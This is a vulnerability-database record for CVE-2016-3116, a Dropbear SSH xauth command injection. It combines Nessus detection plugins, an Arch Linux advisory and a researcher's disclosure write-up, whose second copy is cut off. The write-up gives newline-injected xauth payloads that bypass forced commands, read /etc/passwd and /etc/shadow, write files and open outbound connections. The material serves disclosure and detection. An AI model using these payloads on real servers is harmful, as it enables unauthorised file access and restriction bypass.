2016.73\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Dropbear\");\n}\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2021-03-01T02:07:18", "description": "According to its self-reported version in the 
banner, the version of\nDropbear SSH running on the remote host is prior to 2016.72. It is,\ntherefore, affected by a command injection vulnerability when X11\nForwarding is enabled, due to improper sanitization of X11\nauthentication credentials. An authenticated, remote attacker can\nexploit this to execute arbitrary xauth commands on the remote host.\n\nNote that X11 Forwarding is not enabled by default.", "edition": 28, "cvss3": {"score": 6.4, "vector": "AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"}, "published": "2016-03-18T00:00:00", "title": "Dropbear SSH Server < 2016.72 xauth Command Injection", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3116"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:matt_johnston:dropbear_ssh_server"], "id": "DROPBEAR_SSH_72.NASL", "href": "https://www.tenable.com/plugins/nessus/90027", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(90027);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/11/20\");\n\n script_cve_id(\"CVE-2016-3116\");\n\n script_name(english:\"Dropbear SSH Server < 2016.72 xauth Command Injection\");\n script_summary(english:\"Checks remote SSH server type and version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SSH service is affected by a command injection\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version in the banner, the version of\nDropbear SSH running on the remote host is prior to 2016.72. It is,\ntherefore, affected by a command injection vulnerability when X11\nForwarding is enabled, due to improper sanitization of X11\nauthentication credentials. 
An authenticated, remote attacker can\nexploit this to execute arbitrary xauth commands on the remote host.\n\nNote that X11 Forwarding is not enabled by default.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://matt.ucc.asn.au/dropbear/CHANGES\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2016/Mar/47\");\n # https://github.com/mkj/dropbear/commit/18681875e30e1ea251914417829fdbb50534c9ba\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c1e20657\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Dropbear SSH version 2016.72 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-3116\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/03/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/18\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:matt_johnston:dropbear_ssh_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_detect.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"backport.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\napp = \"Dropbear SSH\";\nport = get_service(svc:\"ssh\", exit_on_fail:TRUE);\n\norig_banner = get_kb_item_or_exit(\"SSH/banner/\" + port);\nbanner = get_backport_banner(banner:orig_banner);\n\n# Make sure it's Dropbear.\nif (\"dropbear\" >!< banner) audit(AUDIT_NOT_DETECT, \"Dropbear SSH\", port);\n\nif (backported) audit(AUDIT_BACKPORT_SERVICE, port, \"Dropbear SSH\");\n\nitem = eregmatch(pattern:\"dropbear_([0-9]+\\.[0-9]+(\\.[0-9]+)?)($|[^0-9])\", string:banner);\nif (isnull(item)) audit(AUDIT_SERVICE_VER_FAIL, \"Dropbear SSH\", port);\nversion = item[1];\n\n#SSH version : SSH-2.0-dropbear_0.53.1\n#SSH version : SSH-2.0-dropbear_2011.54\nif (version =~ \"^(0|201[1-5])\\.\")\n{\n report_items = make_array(\n \"Version source\", orig_banner,\n \"Installed version\", version,\n \"Fixed version\", \"2016.72\"\n );\n order = make_list(\"Version source\", \"Installed version\", \"Fixed version\");\n report = report_items_str(report_items:report_items, ordered_fields:order);\n security_report_v4(severity:SECURITY_WARNING, port:port, extra:report);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"Dropbear SSH\", port, version);\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:46", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3116"], "description": "A vulnerability was found in a way dropbear processed X11 forwarding\ninput. 
By using a specially crafted request, an attacker could bypass\nthe authorized_keys command restrictions.\n\nxauth is run under the user's privilege, so this vulnerability offers no\nadditional access to unrestricted accounts, but could circumvent key or\naccount restrictions such as sshd_config ForceCommand, authorized_keys\ncommand="..." or restricted shells.", "modified": "2016-03-14T00:00:00", "published": "2016-03-14T00:00:00", "id": "ASA-201603-19", "href": "https://lists.archlinux.org/pipermail/arch-security/2016-March/000584.html", "type": "archlinux", "title": "dropbear: command injection", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}}], "zdt": [{"lastseen": "2018-03-20T00:16:11", "edition": 2, "description": "Exploit for linux platform in category remote exploits", "published": "2016-03-03T00:00:00", "type": "zdt", "title": "DropBearSSHD 2015.71 - Command Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3116"], "modified": "2016-03-03T00:00:00", "id": "1337DAY-ID-25388", "href": "https://0day.today/exploit/description/25388", "sourceData": "VuNote\r\n============\r\n \r\n Author: <github.com/tintinweb>\r\n Ref: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3116\r\n Version: 0.2\r\n Date: Mar 3rd, 2016\r\n \r\n Tag: dropbearsshd xauth command injection may lead to forced-command bypass\r\n \r\nOverview\r\n--------\r\n \r\n Name: dropbear\r\n Vendor: Matt Johnston\r\n References: * https://matt.ucc.asn.au/dropbear/dropbear.html [1]\r\n \r\n Version: 2015.71\r\n Latest Version: 2015.71\r\n Other Versions: <= 2015.71 (basically all versions with x11fwd support; v0.44 ~11 years)\r\n Platform(s): linux\r\n Technology: c\r\n \r\n Vuln Classes: CWE-93 - Improper Neutralization of CRLF Sequences ('CRLF Injection')\r\n Origin: remote\r\n Min. 
Privs.: post auth\r\n \r\n CVE: CVE-2016-3116\r\n \r\n \r\n \r\nDescription\r\n---------\r\n \r\nquote website [1]\r\n \r\n>Dropbear is a relatively small SSH server and client. It runs on a variety of POSIX-based platforms. Dropbear is open source software, distributed under a MIT-style license. Dropbear is particularly useful for \"embedded\"-type Linux (or other Unix) systems, such as wireless routers.\r\n \r\nSummary \r\n-------\r\n \r\nAn authenticated user may inject arbitrary xauth commands by sending an\r\nx11 channel request that includes a newline character in the x11 cookie. \r\nThe newline acts as a command separator to the xauth binary. This attack requires \r\nthe server to have 'X11Forwarding yes' enabled. Disabling it, mitigates this vector.\r\n \r\nBy injecting xauth commands one gains limited* read/write arbitrary files, \r\ninformation leakage or xauth-connect capabilities. These capabilities can be\r\nleveraged by an authenticated restricted user - e.g. one with configured forced-commands - to bypass \r\naccount restriction. This is generally not expected.\r\n \r\nThe injected xauth commands are performed with the effective permissions of the \r\nlogged in user as the sshd already dropped its privileges. \r\n \r\nQuick-Info:\r\n \r\n* requires: X11Forwarding yes\r\n* does *NOT* bypass /bin/false due to special treatment (like nologin)\r\n* bypasses forced-commands (allows arbitr. 
read/write)\r\n \r\nCapabilities (xauth):\r\n \r\n* Xauth\r\n * write file: limited chars, xauthdb format\r\n * read file: limit lines cut at first \\s\r\n * infoleak: environment\r\n * connect to other devices (may allow port probing)\r\n \r\n \r\nsee attached PoC\r\n \r\n \r\nDetails\r\n-------\r\n \r\n// see annotated code below\r\n \r\n * x11req (svr-x11fwd.c:46)\r\n \r\n * execchild (svr-chansession.c:893)\r\n *- x11setauth (svr-x11fwd.c:129)\r\n \r\nUpon receiving an `x11-req` type channel request dropbearsshd parses the channel request\r\nparameters `x11authprot` and `x11authcookie` from the client ssh packet where\r\n`x11authprot` contains the x11 authentication method used (e.g. `MIT-MAGIC-COOKIE-1`)\r\nand `x11authcookie` contains the actual x11 auth cookie. This information is stored\r\nin a session specific datastore. When calling `execute` on that session, dropbear will\r\ncall `execchild` and - in case it was compiled with x11 support - setup x11 forwarding\r\nby executing `xauth` with the effective permissions of the user and pass commands via `stdin`.\r\nNote that `x11authcookie` nor `x11authprot` was sanitized or validated, it just contains\r\nuser-tainted data. Since `xauth` commands are passed via `stdin` and `\\n` is a\r\ncommand-separator to the `xauth` binary, this allows a client to inject arbitrary\r\n`xauth` commands.\r\n \r\nThis is an excerpt of the `man xauth` [2] to outline the capabilities of this xauth\r\ncommand injection:\r\n \r\n SYNOPSIS\r\n xauth [ -f authfile ] [ -vqibn ] [ command arg ... 
]\r\n \r\n add displayname protocolname hexkey\r\n generate displayname protocolname [trusted|untrusted] [timeout seconds] [group group-id] [data hexdata]\r\n [n]extract filename displayname...\r\n [n]list [displayname...]\r\n [n]merge [filename...]\r\n remove displayname...\r\n source filename\r\n info \r\n exit\r\n quit\r\n version\r\n help\r\n ?\r\n \r\nInteresting commands are:\r\n \r\n info - leaks environment information / path\r\n ~# xauth info\r\n xauth: file /root/.Xauthority does not exist\r\n Authority file: /root/.Xauthority\r\n File new: yes\r\n File locked: no\r\n Number of entries: 0\r\n Changes honored: yes\r\n Changes made: no\r\n Current input: (argv):1\r\n \r\n source - arbitrary file read (cut on first `\\s`)\r\n # xauth source /etc/shadow\r\n xauth: file /root/.Xauthority does not exist\r\n xauth: /etc/shadow:1: unknown command \"smithj:Ep6mckrOLChF.:10063:0:99999:7:::\"\r\n \r\n extract - arbitrary file write \r\n * limited characters\r\n * in xauth.db format\r\n * since it is not compressed it can be combined with `xauth add` to \r\n first store data in the database and then export it to an arbitrary\r\n location e.g. to plant a shell or do other things.\r\n \r\n generate - connect to <ip>:<port> (port probing, connect back and pot. exploit\r\n vulnerabilities in X.org\r\n \r\n \r\nSource\r\n------\r\n \r\nInline annotations are prefixed with `//#!`\r\n \r\n* handle x11 request, stores cookie in `chansess`\r\n ```c\r\n /* called as a request for a session channel, sets up listening X11 */\r\n /* returns DROPBEAR_SUCCESS or DROPBEAR_FAILURE */\r\n int x11req(struct ChanSess * chansess) {\r\n \r\n int fd;\r\n \r\n /* we already have an x11 connection */\r\n if (chansess->x11listener != NULL) {\r\n return DROPBEAR_FAILURE;\r\n }\r\n \r\n chansess->x11singleconn = buf_getbyte(ses.payload);\r\n chansess->x11authprot = buf_getstring(ses.payload, NULL); //#! store user tainted data\r\n chansess->x11authcookie = buf_getstring(ses.payload, NULL); //#! 
store user tainted data\r\n chansess->x11screennum = buf_getint(ses.payload);\r\n ```\r\n \r\n* set auth cookie/authprot\r\n \r\n ```c\r\n /* This is called after switching to the user, and sets up the xauth\r\n * and environment variables. */\r\n void x11setauth(struct ChanSess *chansess) {\r\n \r\n char display[20]; /* space for \"localhost:12345.123\" */\r\n FILE * authprog = NULL;\r\n int val;\r\n \r\n if (chansess->x11listener == NULL) {\r\n return;\r\n }\r\n \r\n ...\r\n \r\n /* popen is a nice function - code is strongly based on OpenSSH's */\r\n authprog = popen(XAUTH_COMMAND, \"w\"); //#! run xauth binary\r\n if (authprog) {\r\n fprintf(authprog, \"add %s %s %s\\n\",\r\n display, chansess->x11authprot, chansess->x11authcookie); //#! \\n injection in cookie, authprot\r\n pclose(authprog);\r\n } else {\r\n fprintf(stderr, \"Failed to run %s\\n\", XAUTH_COMMAND);\r\n }\r\n }\r\n ```\r\n \r\nProof of Concept\r\n----------------\r\n \r\nPrerequisites: \r\n \r\n* install python 2.7.x\r\n* issue `#> pip install paramiko` to install `paramiko` ssh library for python 2.x\r\n* run `poc.py`\r\n \r\nNote: see cve-2016-3115 [3] for `poc.py`\r\n \r\n Usage: <host> <port> <username> <password or path_to_privkey>\r\n \r\n path_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key\r\n \r\n \r\npoc:\r\n \r\n1. 
configure one user (user1) for `force-commands`:\r\n ```c \r\n #PUBKEY line - force commands: only allow \"whoami\"\r\n #cat /home/user1/.ssh/authorized_keys\r\n command=\"whoami\" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user1@box\r\n \r\n #cat /etc/passwd\r\n user1:x:1001:1001:,,,:/home/user1:/bin/bash\r\n ```\r\n \r\n2. run dropbearsshd (x11fwd is on by default)\r\n \r\n ```c\r\n #> ~/dropbear-2015.71/dropbear -R -F -E -p 2222\r\n [22861] Not backgrounding\r\n [22862] Child connection from 192.168.139.1:49597\r\n [22862] Forced command 'whoami'\r\n [22862] Pubkey auth succeeded for 'user1' with key md5 dc:b8:56:71:89:36:fb:dc:0e:a0:2b:17:b9:83:d2:dd from 192.168.139.1:49597\r\n ``` \r\n \r\n3. 
`forced-commands` - connect with user1 and display env information\r\n \r\n ```c\r\n #> python <host> 2222 user1 .demoprivkey\r\n \r\n INFO:__main__:add this line to your authorized_keys file: \r\n #PUBKEY line - force commands: only allow \"whoami\"\r\n #cat /home/user/.ssh/authorized_keys\r\n command=\"whoami\" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user@box\r\n \r\n INFO:__main__:connecting to: user1:<PKEY>@192.168.139.129:2222\r\n INFO:__main__:connected!\r\n INFO:__main__:\r\n Available commands:\r\n .info\r\n .readfile <path>\r\n .writefile <path> <data>\r\n .exit .quit\r\n <any xauth command or type help>\r\n \r\n #> .info\r\n DEBUG:__main__:auth_cookie: '\\ninfo'\r\n DEBUG:__main__:dummy exec returned: None\r\n INFO:__main__:Authority file: /home/user1/.Xauthority\r\n File new: no\r\n File locked: no\r\n Number of entries: 2\r\n Changes honored: yes\r\n Changes made: no\r\n Current input: (stdin):2\r\n user1\r\n /usr/bin/xauth: (stdin):1: bad \"add\" command line\r\n \r\n ...\r\n ```\r\n \r\n4. `forced-commands` - read `/etc/passwd`\r\n \r\n ```c\r\n ...\r\n #> .readfile /etc/passwd\r\n DEBUG:__main__:auth_cookie: 'xxxx\\nsource /etc/passwd\\n'\r\n DEBUG:__main__:dummy exec returned: None\r\n INFO:__main__:root:x:0:0:root:/root:/bin/bash\r\n daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\r\n bin:x:2:2:bin:/bin:/usr/sbin/nologin\r\n sys:x:3:3:sys:/dev:/usr/sbin/nologin\r\n sync:x:4:65534:sync:/bin:/bin/sync\r\n ...\r\n ```\r\n \r\n5. 
`forced-commands` - write `/tmp/testfile`\r\n \r\n ```c\r\n #> .writefile /tmp/testfile1 `thisisatestfile`\r\n DEBUG:__main__:auth_cookie: '\\nadd 127.0.0.250:65500 `thisisatestfile` aa'\r\n DEBUG:__main__:dummy exec returned: None\r\n DEBUG:__main__:auth_cookie: '\\nextract /tmp/testfile1 127.0.0.250:65500'\r\n DEBUG:__main__:dummy exec returned: None\r\n DEBUG:__main__:user1\r\n /usr/bin/xauth: (stdin):1: bad \"add\" command line\r\n \r\n #> INFO:__main__:/tmp/testfile1\r\n \r\n #> ls -lsat /tmp/testfile1\r\n 4 -rw------- 1 user1 user1 59 xx xx 12:51 /tmp/testfile1\r\n \r\n #> cat /tmp/testfile1\r\n \u00fa65500hi\u00fa65500`thisisatestfile`\u00aar\r\n ```\r\n \r\n6. `forced-commands` - initiate outbound X connection to 8.8.8.8:6100\r\n \r\n ```c\r\n #> generate 8.8.8.8:100\r\n DEBUG:__main__:auth_cookie: '\\ngenerate 8.8.8.8:100'\r\n DEBUG:__main__:dummy exec returned: None\r\n INFO:__main__:user1\r\n /usr/bin/xauth: (stdin):1: bad \"add\" command line\r\n /usr/bin/xauth: (stdin):2: unable to open display \"8.8.8.8:100\".\r\n \r\n #> tcpdump \r\n IP <host> 8.8.8.8.6100: Flags [S], seq 81800807, win 29200, options [mss 1460,sackOK,TS val 473651893 ecr 0,nop,wscale 10], length 0\r\n ``` \r\n \r\nFix\r\n---\r\n \r\n* Sanitize user-tainted input `chansess->x11authcookie`\r\n \r\n \r\nMitigation / Workaround\r\n------------------------\r\n \r\n* disable x11-forwarding: re-compile without x11 support: remove `options.h` -> `#define ENABLE_X11FWD`\r\n \r\nNotes\r\n-----\r\n \r\nThanks to the OpenSSH team for coordinating the fix!\r\n \r\nVendor response see: changelog [4]\r\n \r\n \r\nReferences\r\n----------\r\n \r\n [1] https://matt.ucc.asn.au/dropbear/dropbear.html\r\n [2] http://linux.die.net/man/1/xauth\r\n [3] https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3115/\r\n [4] https://matt.ucc.asn.au/dropbear/CHANGES\r\n \r\nContact\r\n-------\r\n \r\n https://github.com/tintinweb\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 5.5, "vector": 
"AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "sourceHref": "https://0day.today/exploit/25388"}], "exploitdb": [{"lastseen": "2016-07-18T19:13:39", "description": "DropBearSSHD <= 2015.71 - Command Injection. CVE-2016-3116. Remote exploit for Linux platform", "published": "2016-03-03T00:00:00", "type": "exploitdb", "title": "DropBearSSHD <= 2015.71 - Command Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3116"], "modified": "2016-03-03T00:00:00", "id": "EDB-ID:40119", "href": "https://www.exploit-db.com/exploits/40119/", "sourceData": "VuNote\r\n============\r\n\r\n\tAuthor:\t\t<github.com/tintinweb>\r\n\tRef:\t\thttps://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3116\r\n\tVersion: \t0.2\r\n\tDate: \t\tMar 3rd, 2016\r\n\t\r\n\tTag:\t\tdropbearsshd xauth command injection may lead to forced-command bypass\r\n\r\nOverview\r\n--------\r\n\r\n\tName:\t\t\tdropbear\r\n\tVendor:\t\t\tMatt Johnston\r\n\tReferences:\t\t* https://matt.ucc.asn.au/dropbear/dropbear.html [1]\r\n\t\r\n\tVersion:\t\t2015.71\r\n\tLatest Version:\t2015.71\r\n\tOther Versions:\t<= 2015.71 (basically all versions with x11fwd support; v0.44 ~11 years)\r\n\tPlatform(s):\tlinux\r\n\tTechnology:\t\tc\r\n\r\n\tVuln Classes:\tCWE-93 - Improper Neutralization of CRLF Sequences ('CRLF Injection')\r\n\tOrigin:\t\t\tremote\r\n\tMin. Privs.:\tpost auth\r\n\r\n\tCVE:\t\t\tCVE-2016-3116\r\n\r\n\r\n\r\nDescription\r\n---------\r\n\r\nquote website [1]\r\n\r\n>Dropbear is a relatively small SSH server and client. It runs on a variety of POSIX-based platforms. Dropbear is open source software, distributed under a MIT-style license. Dropbear is particularly useful for \"embedded\"-type Linux (or other Unix) systems, such as wireless routers.\r\n\r\nSummary \r\n-------\r\n\r\nAn authenticated user may inject arbitrary xauth commands by sending an\r\nx11 channel request that includes a newline character in the x11 cookie. 
\r\nThe newline acts as a command separator to the xauth binary. This attack requires \r\nthe server to have 'X11Forwarding yes' enabled. Disabling it, mitigates this vector.\r\n\r\nBy injecting xauth commands one gains limited* read/write arbitrary files, \r\ninformation leakage or xauth-connect capabilities. These capabilities can be\r\nleveraged by an authenticated restricted user - e.g. one with configured forced-commands - to bypass \r\naccount restriction. This is generally not expected.\r\n\r\nThe injected xauth commands are performed with the effective permissions of the \r\nlogged in user as the sshd already dropped its privileges. \r\n\r\nQuick-Info:\r\n\r\n* requires: X11Forwarding yes\r\n* does *NOT* bypass /bin/false due to special treatment (like nologin)\r\n* bypasses forced-commands (allows arbitr. read/write)\r\n\r\nCapabilities (xauth):\r\n\r\n* Xauth\r\n\t* write file: limited chars, xauthdb format\r\n\t* read file: limit lines cut at first \\s\r\n\t* infoleak: environment\r\n\t* connect to other devices (may allow port probing)\r\n\r\n\r\nsee attached PoC\r\n\r\n\r\nDetails\r\n-------\r\n\r\n// see annotated code below\r\n\r\n\t* x11req (svr-x11fwd.c:46)\r\n \r\n * execchild (svr-chansession.c:893)\r\n *- x11setauth (svr-x11fwd.c:129)\r\n\r\nUpon receiving an `x11-req` type channel request dropbearsshd parses the channel request\r\nparameters `x11authprot` and `x11authcookie` from the client ssh packet where\r\n`x11authprot` contains the x11 authentication method used (e.g. `MIT-MAGIC-COOKIE-1`)\r\nand `x11authcookie` contains the actual x11 auth cookie. This information is stored\r\nin a session specific datastore. 
When calling `execute` on that session, dropbear will\r\ncall `execchild` and - in case it was compiled with x11 support - setup x11 forwarding\r\nby executing `xauth` with the effective permissions of the user and pass commands via `stdin`.\r\nNote that `x11authcookie` nor `x11authprot` was sanitized or validated, it just contains\r\nuser-tainted data. Since `xauth` commands are passed via `stdin` and `\\n` is a\r\ncommand-separator to the `xauth` binary, this allows a client to inject arbitrary\r\n`xauth` commands.\r\n\r\nThis is an excerpt of the `man xauth` [2] to outline the capabilities of this xauth\r\ncommand injection:\r\n\r\n\tSYNOPSIS\r\n \txauth [ -f authfile ] [ -vqibn ] [ command arg ... ]\r\n\r\n\t\tadd displayname protocolname hexkey\r\n\t\tgenerate displayname protocolname [trusted|untrusted] [timeout seconds] [group group-id] [data hexdata]\r\n\t\t[n]extract filename displayname...\r\n\t\t[n]list [displayname...]\r\n\t\t[n]merge [filename...]\r\n\t\tremove displayname...\r\n\t\tsource filename\r\n\t\tinfo \r\n\t\texit\r\n\t\tquit\r\n\t\tversion\r\n\t\thelp\r\n\t\t?\r\n\t\t\r\nInteresting commands are:\r\n\t\r\n\tinfo\t - leaks environment information / path\r\n\t\t\t~# xauth info\r\n\t\t\txauth: file /root/.Xauthority does not exist\r\n\t\t\tAuthority file: /root/.Xauthority\r\n\t\t\tFile new: yes\r\n\t\t\tFile locked: no\r\n\t\t\tNumber of entries: 0\r\n\t\t\tChanges honored: yes\r\n\t\t\tChanges made: no\r\n\t\t\tCurrent input: (argv):1\r\n\t\r\n\tsource\t - arbitrary file read (cut on first `\\s`)\r\n\t\t\t# xauth source /etc/shadow\r\n\t\t\txauth: file /root/.Xauthority does not exist\r\n\t\t\txauth: /etc/shadow:1: unknown command \"smithj:Ep6mckrOLChF.:10063:0:99999:7:::\"\r\n\t\t\t\t\t\t\r\n\textract - arbitrary file write \r\n\t\t\t * limited characters\r\n\t * in xauth.db format\r\n\t * since it is not compressed it can be combined with `xauth add` to \r\n\t first store data in the database and then export it to an arbitrary\r\n\t location 
e.g. to plant a shell or do other things.\r\n\t\r\n\tgenerate - connect to <ip>:<port> (port probing, connect back and pot. exploit\r\n\t\t\t vulnerabilities in X.org\r\n\t\r\n\t\r\nSource\r\n------\r\n\r\nInline annotations are prefixed with `//#!`\r\n\r\n* handle x11 request, stores cookie in `chansess`\r\n\t```c\r\n\t/* called as a request for a session channel, sets up listening X11 */\r\n\t/* returns DROPBEAR_SUCCESS or DROPBEAR_FAILURE */\r\n\tint x11req(struct ChanSess * chansess) {\r\n\t\r\n\t\tint fd;\r\n\t\r\n\t\t/* we already have an x11 connection */\r\n\t\tif (chansess->x11listener != NULL) {\r\n\t\t\treturn DROPBEAR_FAILURE;\r\n\t\t}\r\n\t\r\n\t\tchansess->x11singleconn = buf_getbyte(ses.payload);\r\n\t\tchansess->x11authprot = buf_getstring(ses.payload, NULL);\t\t\t//#! store user tainted data\r\n\t\tchansess->x11authcookie = buf_getstring(ses.payload, NULL);\t\t\t//#! store user tainted data\r\n\t\tchansess->x11screennum = buf_getint(ses.payload);\r\n\t```\r\n\t\r\n* set auth cookie/authprot\r\n\r\n\t```c\r\n\t/* This is called after switching to the user, and sets up the xauth\r\n\t * and environment variables. */\r\n\tvoid x11setauth(struct ChanSess *chansess) {\r\n\t\r\n\t\tchar display[20]; /* space for \"localhost:12345.123\" */\r\n\t\tFILE * authprog = NULL;\r\n\t\tint val;\r\n\t\r\n\t\tif (chansess->x11listener == NULL) {\r\n\t\t\treturn;\r\n\t\t}\r\n\t\r\n\t\t...\r\n\t\r\n\t\t/* popen is a nice function - code is strongly based on OpenSSH's */\r\n\t\tauthprog = popen(XAUTH_COMMAND, \"w\");\t\t\t\t\t\t\t\t\t\t//#! run xauth binary\r\n\t\tif (authprog) {\r\n\t\t\tfprintf(authprog, \"add %s %s %s\\n\",\r\n\t\t\t\t\tdisplay, chansess->x11authprot, chansess->x11authcookie);\t\t//#! 
\\n injection in cookie, authprot\r\n\t\t\tpclose(authprog);\r\n\t\t} else {\r\n\t\t\tfprintf(stderr, \"Failed to run %s\\n\", XAUTH_COMMAND);\r\n\t\t}\r\n\t}\r\n\t```\r\n\r\nProof of Concept\r\n----------------\r\n\r\nPrerequisites: \r\n\r\n* install python 2.7.x\r\n* issue `#> pip install paramiko` to install `paramiko` ssh library for python 2.x\r\n* run `poc.py`\r\n\r\nNote: see cve-2016-3115 [3] for `poc.py`\r\n\r\n\t Usage: <host> <port> <username> <password or path_to_privkey>\r\n\t \r\n\t path_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key\r\n\t \r\n\r\npoc:\r\n\r\n1. configure one user (user1) for `force-commands`:\r\n\t```c \r\n\t#PUBKEY line - force commands: only allow \"whoami\"\r\n\t#cat /home/user1/.ssh/authorized_keys\r\n\tcommand=\"whoami\" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user1@box\r\n\r\n\t#cat /etc/passwd\r\n\tuser1:x:1001:1001:,,,:/home/user1:/bin/bash\r\n\t```\r\n\t \r\n2. run dropbearsshd (x11fwd is on by default)\r\n\r\n\t```c\r\n\t#> ~/dropbear-2015.71/dropbear -R -F -E -p 2222\r\n\t[22861] Not backgrounding\r\n\t[22862] Child connection from 192.168.139.1:49597\r\n\t[22862] Forced command 'whoami'\r\n\t[22862] Pubkey auth succeeded for 'user1' with key md5 dc:b8:56:71:89:36:fb:dc:0e:a0:2b:17:b9:83:d2:dd from 192.168.139.1:49597\r\n\t```\t\r\n\r\n3. 
